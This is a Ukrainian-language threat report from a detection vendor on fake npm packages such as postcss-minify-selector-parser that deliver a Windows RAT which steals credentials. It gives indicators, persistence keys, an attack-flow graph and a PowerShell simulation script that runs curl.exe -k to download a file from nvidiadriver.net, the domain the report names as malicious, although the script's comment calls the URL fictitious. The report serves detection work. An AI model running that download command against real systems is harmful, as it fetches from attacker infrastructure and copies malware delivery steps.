PostCSS переодягається як шлях до доставки RAT на Windows

SOC Prime Team

Стежити

PostCSS переодягається як шлях до доставки RAT на Windows

Detection stack

AIDR
Alert
ETL
Query

Звіт про загрози
Потік атаки
Виявлення
Симуляції

Резюме

Атакувальні використовують імітацію npm-пакунків для розповсюдження багатоступеневих Windows RAT. Шкідливі пакунки, такі як postcss-minify-selector-parser подаються як легітимні інструменти збірки для компрометації середовищ розробників. Після активації ланцюг інфекції запускає завантажувач PowerShell, який отримує Nuitka-компільований Python RAT, здатний красти облікові дані та надавати віддалений доступ до оболонки.

Розслідування

Дослідники виявили кластер шкідливих npm-пакунків, що посилаються на легітимні залежності, щоб здаватися правдоподібними. Розслідування визначило багатошарову ланцюг інфекції, що починається з JavaScript-завантажувача, переходить до завантажувача PowerShell і завершується складним Python-навантаженням. Аналізуючи компоненти, компільовані Nuitka, дослідникам вдалося реконструювати протокол командування та управління RAT та підтримувані команди.

Захист

Користувачі мають негайно видалити виявлені шкідливі npm-пакунки та перевірити дерева залежностей на предмет будь-якої транзитивної експозиції. Організації повинні також блокувати відомі домени команди та управління та IP-адреси. Якщо підозрюється компрометація, розробники повинні змінити облікові дані, збережені у браузерах, та всі токени, пов’язані з розробкою, без затримки.

Відповідь

Слід перевірити Windows-ендпойнти на артефакти, такі як %TEMP%winPatch, %TEMP%.store, та %TEMP%.host. Слід також перевірити сталість у HKCURun ключі реєстру для значення csshost. Повний аудит робочих станцій розробника повинен бути проведений для виявлення несанкціонованої активності віддаленої оболонки або ознак крадіжки облікових даних. value. A full audit of developer workstations should be conducted to identify unauthorized remote shell activity or signs of credential theft.

"graph TB %% Class Definitions classDef technique fill:#99ccff classDef malware fill:#ff9999 classDef tool fill:#cccccc classDef persistence fill:#99ff99 %% Node Definitions attack_supply_chain["Техніка – T1195.001 Компрометація постачання: Компрометація залежностей програмного забезпечення та інструментів розробки Опис: Імітація пакунків на npm за допомогою схожих пакунків, таких як postcss-minify-selector-parser. Ціль: Середовища розробників"] class attack_supply_chain technique attack_user_execution["Техніка – T1204.005 Виконання користувача: Шкідлива бібліотека Опис: Активується, коли імпортується шкідливий npm пакунок. Дія: Виконує закодований JavaScript-завантажувач."] class attack_user_execution technique process_powershell["Техніка – T1059.001 Команда та сценарій інтерпретатор: PowerShell Опис: PowerShell використовується для написання та виконання шкідливого сценарію. Файл: ../../settings.ps1"] class process_powershell technique attack_indicator_removal["Техніка – T1070.010 Видалення індикаторів: Переміщення шкідливого програмного забезпечення Опис: Використання оманливого домену для завантаження корисного навантаження. Домен: nvidiadriver[.]net"] class attack_indicator_removal technique tool_cmd_shell["Техніка – T1059.003 Команда та сценарій інтерпретатор: Оболонка команд Windows Опис: Використовується для вилучення пакету корисного навантаження. Тригер: Виконання після завантаження."] class tool_cmd_shell technique malware_vbs_bootstrapper["Шкідливе програмне забезпечення – VBS Bootstrapper Опис: Запускає основне шкідливе навантаження."] class malware_vbs_bootstrapper malware malware_rat["Шкідливе програмне забезпечення – Інструмент віддаленого доступу (RAT) Опис: Пайтонівський завантажувач, що використовує модулі, компільовані Nuitka. Функціонал: Забезпечує можливості віддаленого доступу."] class malware_rat malware attack_persistence["Техніка – T1547.001 Запуск автозапуску або входу: Ключі Реєстру / Папка автозавантаження Опис: Створює значення реєстру для збереження стійкості. Значення Реєстру: csshost"] class attack_persistence persistence attack_evasion["Техніка – T1497.001 Уникнення віртуалізації / пісочниці: Системні перевірки Опис: Використовує запити WMI для виявлення віртуальних середовищ. Команда: wmic bios get serialnumber"] class attack_evasion technique attack_c2["Техніка – T1219 Засоби віддаленого доступу Опис: Підтримує зв’язок із сервером C2 через шифровані пакети POST. C2 Адреса: hxxp[:]//95[.]216[.]92[.]207:8080"] class attack_c2 technique attack_credential_access["Техніка – T1555.003 Облікові дані із сховищ паролів: Облікові дані із веб-браузерів Опис: Краде збережені облікові дані з Chrome. Цільові файли: Дані для входу та Локальний стан"] class attack_credential_access technique %% Connections attack_supply_chain –>|веде до| attack_user_execution attack_user_execution –>|виконує| process_powershell process_powershell –>|виконує| attack_indicator_removal attack_indicator_removal –>|тригер| tool_cmd_shell tool_cmd_shell –>|запускає| malware_vbs_bootstrapper malware_vbs_bootstrapper –>|встановлює| malware_rat malware_rat –>|встановлює| attack_persistence malware_rat –>|виконує| attack_evasion malware_rat –>|зв’язується через| attack_c2 malware_rat –>|відправляє| attack_credential_access "

Потік атаки

Переглянути

## Виконання симуляції

Попередня умова: Телеметрія & Базова перевірка повинні були пройти успішно.

Обґрунтування: Цей розділ детально описує точне виконання техники атаки (TTP), що розроблена для активації правила детекції. Команди та наратив повинні безпосередньо відображати визначені TTP та прагнути генерувати точну телеметрію, що очікується логікою детекції. Абстрактні або не пов’язані приклади можуть призвести до помилкового діагнозу.

Сценарій атаки та команди: Супротивник має намір отримати точку опори в системі, маскуючись під легітимний процес оновлення програмного забезпечення. Для досягнення цього вони використовують PowerShell для виклику вбудованого curl.exe утиліти. Використовуючи -k флаг (незахищений), вони обходять перевірку SSL-сертифікатів, і, вказавши шлях призначення у $env:TEMP з назвою файлу, як winPatch.zip, вони намагаються злитись з шумом рутинних оновлень системи. Мета полягає в завантаженні шкідливого навантаження, яке, після виконання, забезпечить віддалений доступ.

Сценарій тесту регресії:

# Сценарій симуляції для активації конкретного правила детекції
# Примітка: використовується фіктивний URL для безпеки, але імітує точну структуру, вимагаєму правилом.

$cmd = 'curl.exe -k -o "$env:TEMPwinPatch.zip" https://nvidiadriver.net/verv1432/winpatch-xd7d.win'

Write-Host "Виконання симульованої команди шкідливого завантаження..."
Invoke-Expression $cmd

Команди очищення:

# Очистіть завантажений фіктивний файл
if (Test-Path "$env:TEMPwinPatch.zip") {
    Remove-Item -Path "$env:TEMPwinPatch.zip" -Force
    Write-Host "Очищення успішне: Фіктивний файл видалено."
} else {
    Write-Host "Очищення: Файл не знайдено."
}

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно